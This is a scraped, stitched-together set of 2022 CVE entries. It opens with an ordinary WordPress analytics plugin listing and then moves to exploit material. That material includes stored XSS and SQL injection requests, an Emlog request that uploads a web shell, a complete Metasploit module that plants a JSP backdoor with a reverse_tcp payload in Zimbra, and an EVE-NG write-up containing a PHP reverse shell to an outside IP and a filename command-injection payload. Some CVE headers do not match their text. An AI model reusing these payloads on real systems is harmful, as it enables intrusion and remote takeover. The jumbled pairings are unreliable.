Auth. (admin+) Stored Cross-Site Scripting (XSS) in Fatcat Apps Analytics Cat plugin <= 1.0.9 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Analytics Cat – Google Analytics is a lean, fast, simple, no-frills way to add your Google Analytics / Universal Google Analytics code to your WordPress site.

This bloat-free, simple Google Analytics WordPress plugin doesn’t add tons of features. Instead, Analytics Cat – Google Analytics simply focuses on letting you add your Google Analytics (Universal Analytics) Code to your site in less than 2 minutes, without slowing your site down.

**Which features does Analytics Cat – Google Analytics have?**

*   Add the Google Analytics (Universal Analytics) tracking code to your WordPress site with ease.
*   Hide your Google Analytics tracking code from logged-in users so you don’t pollute your data.

**How to use Analytics Cat – Google Analytics?**

There are multiple ways to add the Google Analytics tracking code to your WordPress site.

**1\. Pasting your Google Analytics script into your theme**  
This approach isn’t great for two reasons:  
a) If you edit your live site and make a mistake when pasting your Google Analytics script into your theme, you could take down your website.  
b) If your theme is updated with new features or security fixes, your Google Analytics code will be overwritten.

**2\. Pasting your Google Analytics script into a header/footer script plugin**  
This is a valid approach, but has some disadvantages. General purposes “header script plugins” aren’t built from the ground-up to support Google Analytics.

What this means is that :  
a) These plugins lack Google Analytics-specific functionality.  
b) These plugins will not adapt if Google Analytics changes again. Since Analytics Cat is a dedicated Google Analytics WordPress plugin, we’ll make sure make sure to stay compatible with future changes to Google Analytics.  
c) These plugins usually don’t support hiding your Google Analytics code from logged-in users.

**3\. Using Some Other Google Analytics WordPress Plugin**  
There are some good Google Analytics plugins out there, but many of them are bloated, have too many settings and are slow.

You’ll love Analytics Cat – Google Analytics Cat iff what you want is a simple, reliable Google Analytics plugin,

**Does Analytics Cat – Google Analytics Plugin work with Universal Analytics?**

Yes. Analytics Cat is built from the ground up to support Universal Analytics.

Analytics Cat – Google Analytics does not work with the old Google Analytics script that Google deprecated.

**Can I hide my Google Analytics tracking code from logged in users?**

Yes. You can hide your Google Analytics code from logged in users by going to Settings -> Google Analytics Manager.

**Is Analytics Cat – Google Analytics easy to translate?**

Yes. Analytics Cat – Google Analytics Cat is fully translateable. Please let us know if you’re interested in contributing.

**Analytics Cat – Google Analytics Feature Roadmap**

This is just the first version of Analytics Cat – we have tons of new features & improvements lined up. Do you have any suggestions? Please leave a comment in the support forums.

—The Fatcat Apps Team

**Privacy Disclosure**

This plugin can be configured to connect to 3rd party service providers such as Google.

If you use this plugin to connect to a 3rd party, personal data may also be shared with that party.

Additional privacy policy information for 3rd party services can be found here:

Google

Our full privacy policy is available here: https://fatcatapps.com/legal/privacy-policy/

*   Analytics Cat - Google Analytics for WordPress settings screen
    

1.  Upload the Analytics Cat – Google Analytics plugin file (fca-ga.zip) to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  In your sidebar, select ‘Settings -> Google Analytics Manager’ to add your tracking code.

**How do I set up Google Analytics using Analytics Cat?**

After installing this plugin, simply go to Settings -> Google Analytics Manager and add your Google Analytics (Universal Analytics) ID.

**What is my Google Analytics tracking ID?**

Follow these steps to find your Google Analytics tracking id:

1.  Sign in to your Google Analytics account
    
2.  On the bottom left side of the screen, click on “Admin” (Cog icon).
    
3.  Select your preferred Account and Property from the columns.
    
4.  Under Property, Click ‘Tracking Info’ > ‘Tracking Code’
    
5.  You will find your Tracking ID here (example: UA-xxxxxx-01)
    
6.  Paste this Tracking ID into Analytics Cat
    

Important: Do not paste your tracking code (starting with ). Instead, paste your tracking id (example: UA-xxxxxx-01) into Analytics Cat.

**Can I anonimize ip addresses?**

Yes you can! Append the following code to your theme’s functions.php page:

    function my_custom_ga_attributes ( $value ) {
        return '&aip=1';
    }
    
    add_filter( 'fca_ga_attributes', 'my_custom_ga_attributes' );
    

For more information, read this: How to find your Google Analytics tracking code, Google Analytics tracking ID, and Google Analytics property number

This plugin works well and does what it's supposed to do without issues.

Does what it says. Simple and easy to setup.

No extra fluff makes me tear up in joy. Thank you for staying true to the description and point. 👏

I have used this plugin to get input/insights for my ActiveCampaign marketing tool. It does exactly what it says it does, reliably.

It works really well but I deducted a star because I have started getting spam after installing it. Prior to this I was receiving none and this is the only plugin I have installed in the last three months.

Read all 11 reviews

“Analytics Cat – Google Analytics Made Easy” is open source software. The following people have contributed to this plugin.

Contributors

**Analytics Cat – Google Analytics 1.1.1**

*   Improved notices
*   Changed default role exclusion to none
*   Fix potential empty value error reported
*   Remove unused API calls

**Analytics Cat – Google Analytics 1.1.0**

*   Improved security for Editor page
*   Tested up to WordPress 5.9.1

**Analytics Cat – Google Analytics 1.0.9**

*   Updated feedback form
*   Tested up to WordPress 5.6.2

**Analytics Cat – Google Analytics 1.0.8**

*   Fixed double tracking issue

**Analytics Cat – Google Analytics 1.0.7**

*   Tested up to WordPress 5.5

**Analytics Cat – Google Analytics 1.0.6**

*   Added filter fca\_ga\_attributes to add ability to customize enqueued script attributes (see readme)
*   Admin UI text update
*   Removed quotes from Google Analytics ID ( fixed issue with 3rd party add-on )
*   Tested up to WordPress 5.4.2

**Analytics Cat – Google Analytics 1.0.5**

*   Upgraded from analytics.js to gtag.js
*   Tested up to WordPress 5.4.1

**Analytics Cat – Google Analytics 1.0.4**

*   Load Select2 library locally instead of via CDN
*   Add privacy disclosure

**Analytics Cat – Google Analytics 1.0.3**

*   Removed installation splash screen

**Analytics Cat – Google Analytics 1.0.2**

*   Add settings saved message
*   Update help text & links
*   Update permissions text

**Analytics Cat – Google Analytics 1.0.1**

*   Fix link to quick start guide in admin UI

**Analytics Cat – Google Analytics 1.0.0**

*   Release candidate 1 of Analytics Cat – Google Analytics

CVE-2022-40311: Analytics Cat – Google Analytics Made Easy

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

In the **add-patient.php** file, several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

      /\* ... \*/

if(isset($\_POST\['submit'\]))
{
    $docid=$\_SESSION\['id'\];
    $patname=$\_POST\['patname'\];
    $patcontact=$\_POST\['patcontact'\];
    $patemail=$\_POST\['patemail'\];
    $gender=$\_POST\['gender'\];
    $pataddress=$\_POST\['pataddress'\];
    $patage=$\_POST\['patage'\];
    $medhis=$\_POST\['medhis'\];
    $sql=mysqli\_query($con,"insert into tblpatient(Docid,PatientName,PatientContno,PatientEmail,PatientGender,PatientAdd,PatientAge,PatientMedhis)
values('$docid','$patname','$patcontact','$patemail','$gender','$pataddress','$patage','$medhis')");

      /\* ... \*/

In the **admin/manage-patients.php**, **doctor/manage-patient.php**, **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      /\* Example from doctor/view-patient.php\*/

$vid=$\_GET\['viewid'\];
$ret=mysqli\_query($con,"select \* from tblpatient where ID='$vid'");
$cnt=1;
while ($row=mysqli\_fetch\_array($ret)) {

    /\* ... \*/
    echo $row\['PatientName'\];
    /\* ... \*/
    echo $row\['PatientEmail'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientAdd'\];
    /\* ... \*/
    echo $row\['PatientGender'\];
    /\* ... \*/
    echo $row\['PatientMedhis'\];
    /\* ... \*/
    echo $row\['CreationDate'\];
    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **patname**, **patemail**, **gender**, **pataddress** and **medhis** POST parameters.  
The following is one of the possible exploitation using the **medhis POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: localhost
Content-Length: 180
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

patname=Name4&patcontact=3124432845&patemail=Name3%40mail.com&gender=male&pataddress=3021+Halsted+St%2C+Chicago&patage=40&medhis=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42205: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2 | Systems and Internet Security Lab

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

The files **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** share a common piece of code where several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

    /\* ... \*/

if(isset($\_POST\['submit'\]))
{

    $vid=$\_GET\['viewid'\];
    $bp=$\_POST\['bp'\];
    $bs=$\_POST\['bs'\];
    $weight=$\_POST\['weight'\];
    $temp=$\_POST\['temp'\];
    $pres=$\_POST\['pres'\];

    $query.=mysqli\_query($con,"insert tblmedicalhistory(PatientID,BloodPressure,BloodSugar,Weight,Temperature,MedicalPres) 
value('$vid','$bp','$bs','$weight','$temp','$pres')");

    
    /\* ... \*/

In the same files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      
    /\* ...\*/

while ($row=mysqli\_fetch\_array($ret)) { 

    echo $cnt;
    echo $row\['BloodPressure'\];
    echo $row\['Weight'\];
    echo $row\['BloodSugar'\];
    echo $row\['Temperature'\];
    echo $row\['MedicalPres'\];
    echo $row\['CreationDate'\];

    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **bp**, **bs**, **weight**, **temp** and **pres** POST parameters.  
The following is one of the possible exploitation using the **pres POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3 HTTP/1.1
Host: localhost
Content-Length: 94
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

bp=120%2F85&bs=12&weight=70kg&temp=36&pres=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42206: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3 | Systems and Internet Security Lab

Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability.

    POST /emlog/admin/plugin.php?action=upload_zip HTTP/1.1
    Host: 192.168.111.155
    Content-Length: 876
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.111.155
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary804UeairFtrET9Lt
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.111.155/emlog/admin/plugin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lq0s731hnlqm232itjlgpc27el; EM_AUTHCOOKIE_jT79impSwTWeimzUBIsgAmv1NoQbG2Zs=admin%7C1695536025%7C848fc865191736412177851eb6082b92; em_saveLastTime=1664436503884
    Connection: close
    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="pluzip"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���   � Mq=Ua郵/?    �  �   shell/shell.php=?K聾 嗺凔�78h嘍�2渹�v�裫]Dと??$W称��"XjQ皛Q礑??轌3?乿}哏}y��=觾@/@癴撰杻V+5倯x岹儊竲哷孁佸:�蚷?猏Z?,揱戏<氉�賬岈ノ�湞獈煶埑'R齿獙哮甙!?>靾?綱漜晅U?砭7it愴矐堬%{L�z�悏雀╊>��栮詔}岒O懘e隿�鍶趣?爱嘺ㄥ愭�
    AA噣霿扉┹Rq絓茇?cgf?PK���     Bq=U            �   shell/PK��? �   � Mq=Ua郵/?    �  � $               shell/shell.php
           � � F柑)视?F柑)视?�[秤?PK��? �     Bq=U            � $       �   *�  shell/
           � � 棦��视?�8?视?纳�爻迂�PK��    � � ?   N�    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="token"
    
    4e1bef9d513bae43a46448cbbaee0db7d1d5f7d1
    ------WebKitFormBoundary804UeairFtrET9Lt--
    
    

    http://192.168.111.155//emlog/content/plugins/shell/shell.php

CVE-2022-42189: cms_vul/emlog_pro_1.6.0_rce.md at main · wszdhf/cms_vul

This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions Zimbra Collaboration Suite 9.0.0 Patch 26 and below and Zimbra Collaboration Suite 8.8.15 Patch 33 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TAR Path Traversal in Zimbra (CVE-2022-41352)',        'Description' => %q{          This module creates a .tar file that can be emailed to a Zimbra server          to exploit CVE-2022-41352. If successful, it plants a JSP-based          backdoor in the public web directory, then executes that backdoor.          The core vulnerability is a path-traversal issue in the cpio command-          line utlity that can extract an arbitrary file to an arbitrary          location on a Linux system (CVE-2015-1197). Most Linux distros have          chosen not to fix it.          This issue is exploitable on Red Hat-based systems (and other hosts          without pax installed) running versions:          * Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)          * Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)          The patch simply makes "pax" a pre-requisite.        },        'Author' => [          'Alexander Cherepanov', # PoC (in 2015)          'yeak', # Initial report          'Ron Bowes', # Analysis, PoC, and module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-41352'],          ['URL', 'https://forums.zimbra.org/viewtopic.php?t=71153&p=306532'],          ['URL', 'https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/'],          ['URL', 'https://www.openwall.com/lists/oss-security/2015/01/18/7'],          ['URL', 'https://lists.gnu.org/archive/html/bug-cpio/2015-01/msg00000.html'],          ['URL', 'https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis'],          ['URL', 'https://attackerkb.com/topics/FdLYrGfAeg/cve-2015-1197/rapid7-analysis'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27'],          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34'],        ],        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Zimbra Collaboration Suite', {} ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'TARGET_PATH' => '/opt/zimbra/jetty_base/webapps/zimbra/',          'TARGET_FILENAME' => nil,          'DisablePayloadHandler' => false,          'RPORT' => 443,          'SSL' => true        },        'Stance' => Msf::Exploit::Stance::Passive,        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2022-06-28',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('FILENAME', [ false, 'The file name.', 'payload.tar']),        # Separating the path, filename, and extension allows us to randomize the filename        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (an absolute path - eg, /opt/zimbra/...).']),        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: public/<random>.jsp).']),      ]    )    register_advanced_options(      [        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (default: random)']),        OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),        # Took this from multi/handler        OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),        OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])      ]    )  end  def exploit    print_status('Encoding the payload as .jsp')    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)    # Small sanity-check    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')    end    # Generate a filename if needed    target_filename = datastore['TARGET_FILENAME'] || "public/#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp"    symlink_filename = datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..10)    # Sanity check - the file shouldn't exist, but we should be able to do requests to the server    if datastore['TRIGGER_PAYLOAD']      print_status('Checking the HTTP connection to the target')      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_filename)      )      unless res        fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')      end      # Break when the file successfully appears      unless res.code == 404        fail_with(Failure::Unknown, "Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}")      end    end    # Create the file    begin      contents = StringIO.new      Rex::Tar::Writer.new(contents) do |t|        print_status("Adding symlink to path to .tar file: #{datastore['TARGET_PATH']}")        t.add_symlink(symlink_filename, datastore['TARGET_PATH'], 0o755)        print_status("Adding target file to the archive: #{target_filename}")        t.add_file(File.join(symlink_filename, target_filename), 0o644) do |f|          f.write(payload)        end      end      contents.seek(0)      tar = contents.read      contents.close    rescue StandardError => e      fail_with(Failure::BadConfig, "Failed to encode .tar file: #{e}")    end    file_create(tar)    print_good('File created! Email the file above to any user on the target Zimbra server')    # Bail if they don't want the payload triggered    return unless datastore['TRIGGER_PAYLOAD']    register_file_for_cleanup(File.join(datastore['TARGET_PATH'], target_filename))    interval = datastore['CheckInterval'].to_i    print_status("Trying to trigger the backdoor @ #{target_filename} every #{interval}s [backgrounding]...")    # This loop is mostly from `multi/handler`    stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i    timeout = datastore['ListenerTimeout'].to_i    loop do      break if session_created?      break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_filename)      )      unless res        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')      end      # Break when the file successfully appears      if res.code == 200        print_good('Successfully triggered the payload')        # This should break when we get to session_created?      end      Rex::ThreadSafe.sleep(interval)    end  endend

Zimbra Collaboration Suite TAR Path Traversal

Best Student Result Management System v1.0 is vulnerable to SQL Injection via /upresult/upresult/notice-details.php?nid=.

\[+\] Payload: nid=2' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)-- - // Leak place ---> nid

    GET /upresult/upresult/notice-details.php?nid=2%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x61626364,0x31323334,0x71727374)--%20- HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=3thbvl3jh0h823b43vpautdf10
    Connection: close

CVE-2022-42021: bug_report/SQLi-1.md at main · 623085881/bug_report

Simple Exam Reviewer Management System v1.0 is vulnerable to Insecure file upload.

Submitted by oretnom23 on Saturday, February 5, 2022 - 17:22.

****Introduction****

This is a **Simple PHP** entitled **Exam Reviewer Management System**. This is a web-based application is an online platform for reviewing an Exam. It can be useful for schools, companies, organizations, etc. The system provides an answer sheet to the reviewers which have random questions that are possible to occur in the actual exam. The application has a small scope, simple, and is easy to use. It has a pleasant user interface and a mobile responsive at the public side of the system. The project has user-friendly features and functionalities.

****About the Exam Reviewer Management System****

I developed this project using the following:

*   **XAMPP v3.3.0** as my local webserver that has a **PHP Version 8.0.7**
*   **PHP Language**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **Bootstrap**
*   **AdminLTE**
*   and more...

The **Exam Reviewer Management System Project** has 2 sides of the user interface. One is the **Management Side** where the management can manage the Review Questionnaires, and one for the public side. The Public Side of the system is a simple website where the reviewers can read some content about the system, explore the exam reviewer list, and take the Exam to practice. The **Management Side** requires the users to log their system user credentials in order to access the features and functionalities of the said side. The management staffs are the ones who are in charge of managing the practice Test/Exam. This side can be only accessed by 2 types of users which are the **Administrator** and the **Staff**. The **Administrator** has the privilege to access and manage all the features and functionalities on the management side while the **Staff** have only limited access.

****Features********Management Side****

*   **Secure Login and Logout**
*   **Dashboard**
    *   Display the summary of lists.
*   **Exam Categories Management**
    *   Add New Lead Category
    *   List All Lead Categories
    *   View Lead Category
    *   Update Lead Category
    *   Delete Lead Category
*   **Exam Management**
    *   Add New Exam
    *   List All Exams
    *   View Exam
    *   Add Question
    *   List Questions
    *   Update Question
    *   Dynamically add/Remove Choices/Options in every Question
    *   Delete Question
    *   Update Exam
    *   Delete Exam
*   **Manage User List (CRUD)**
*   **Manage Account Details/Credentials**
*   **Manage System Information**

****Public-Side****

*   **Welcome Content**
*   **Exam Lists**
*   **Search Exam**
*   **View Exam Details**
*   **Take the Practice Exam**
*   **View the Practice Exam Result**
*   **'About' Content**

**System Snapshots of some Features****Practice Exam Details (Management Side)**

**Exam List (Public-Side)**

**Exam Details Modal (Public-Side)**

**Questionnaire (Public-Side)**

**Questionnaire - Mobile (Public-Side)**

**Result (Public-Side)**

**Result - Mobile (Public-Side)**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****Installation/Setup****

1.  **Enable** or **Uncomment** the **GD Library** on your php.ini file.
2.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****erms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****erms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Exam Reviewer Management System** in a **browser**. i.e. ****http://localhost/erms/****.

**Default Admin Access**

**Username:** admin  
**Password:** admin123

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Exam Reviewer Management System** in **PHP**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   2679 views

CVE-2022-42201: Simple Exam Reviewer Management System in PHP/OOP Free Source Code

An arbitrary file upload vulnerability in the apiImportLabs function in api_labs.php of EVE-NG 2.0.3-112 Community allows attackers to execute arbitrary code via a crafted UNL file.

Hi all! A few months ago, during an activity, I tested an exposed EVE-NG instance. Immediately I thought:

**“I am going to find a critical vulnerability in EVE-NG!”**

I started the analysis and, a few days later, I reached my mission: now I’m gonna explain you all of my process, from recon to RCE, in:

> EVE-NG 2.0.3-112 (community)

_Let’s goo!_

**Phase 1: Inspecting Source Code**

From EVE-NG Website I downloaded the 2.0.3-112 Community version OVF. It was locally available at 192.168.1.26.

I started the source code analysis by finding potentially dangerous functions like exec, passthru, include and so on. After typing exec in search bar I found this:

_Results of ‘exec’ string_

Looking at results page, I realized it could have been so funny because there were a lot of exec references which imply input data to check and validate. I decided to investigate more in depth on _api\_labs.php_: it exposes an API to manage labs functions.

_api\_labs.php_

A quick sight to these functions gave me a hint on which ones I should focus on:

*   Import Lab
*   Export Lab

_Other ones were more sanitized/hard to exploit or they weren’t “highly related” to a potential RCE._

Function

Possible Exploit

Motivation (lines)

apiCloneLab

Path Traversal

_api\_labs.php_: 107, 117

apiDeleteLab

**RCE**

Possible RCE but hard to exploit (input filters)

apiImportLabs

**RCE**

Possible chained RCE

apiExportLabs

**RCE**

Possible chained RCE

**Phase 2: Exploit Theory**

A deeper inspection led me to this plan:

1.  Import zipped LAB with a payload inside filename
2.  Export the same LAB, thus triggering command execution

> Even if in other API calls UNL filename is checked and verified, in Import LAB feature (ZIP file) there isn’t a check on file parameter:

Function _apiImportLabs_ : html\includes\api_labs.php

_apiImportLabs function_

The absence of this check makes possible to inject arbitrary filenames in UNL files: in Linux almost all characters are permitted inside filename, so it’s fantastic. I only had to end filename with _“.unl”_.

In Export LAB feature there is a check to validate the existence of the file. If the file exists, the filename is passed to exec (parameter we control is $relement):

Function _apiExportLabs_ : html\includes\api_labs.php

_apiExportLabs function_

> **NOTE**: Considering that path delimiters in Linux are forward slashes (/) while I was in Windows environment, I had to inject a payload that didn’t contain such characters (/, : in Windows also \\ is path delimiter). I opted to inject as zip argument a bash command.

**Phase 3: PoC**

1) **Login as Admin**

*   To exploit this vulnerability, we must have enough privileges to create a new Lab. **Admin** user is the only role available in this version, so if you have an account on eve-ng, it will surely be an Administrator.

_Login page_

2) **Import a new LAB**

Once in _/#/main_ you must prepare the payload. Craft a payload as shown in steps below:

*   Create a ZIP file with a simple UNL file
*   Open ZIP file and rename it following these rules:
    *   The filename must end with “.unl”
    *   Filename must not contain these characters: / \\ “ ‘ Considering these limitations and that we must inject bash commands, final payload will be like:

> $(eval $(echo BASE64DATA| base64 --decode)).unl

The best thing we can do in this case is build a reverse shell. Payload is base64 encoded, so we need to base64 encode a reverse shell payload. In my case it has been:

> php -r '$sock=fsockopen("192.168.1.22",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

*   Base64-encoded:

> cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMS4yMiIsNTU1NSk7ZXhlYygiL2Jpbi9zaCAtaSA8JjMgPiYzIDI+JjMiKTsn

But you must change it in the following format:

> php -r '$sock=fsockopen("YOUR_LISTENING_IP",YOUR_LISTENING_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

3) **Upload malicious ZIP file as new Lab**

_Malicious ZIP_

4) **Export LAB**

In this final stage you must export the malicious Lab you’ve just created. Shell commands inside the UNL name will be executed. In case of reverse shell, be sure you are listening on IP and port set in malicious filename.

_Netcat listening_

_Export LAB_

_Reverse Shell_

**STAY TUNED!**

CVE-2022-31366: A deep dive into EVE-NG Remote Command Execution

Categories: News
Categories: Threats
Tags: Ducktail

Tags:  infosteal

Tags:  information stealer

Tags:  Zscaler

Tags:  Trojan

Tags:  Facebook Business

Tags:  Facebook API graph

Tags:  Facebook Ads Manager

Tags:  PHP malware

An information stealer known to go after the Facebook accounts of businesses is now after crypto wallets, too.



(Read more...)




The post New PHP-based Ducktail infostealer is now after crypto wallets appeared first on Malwarebytes Labs.

Posted: October 20, 2022 by

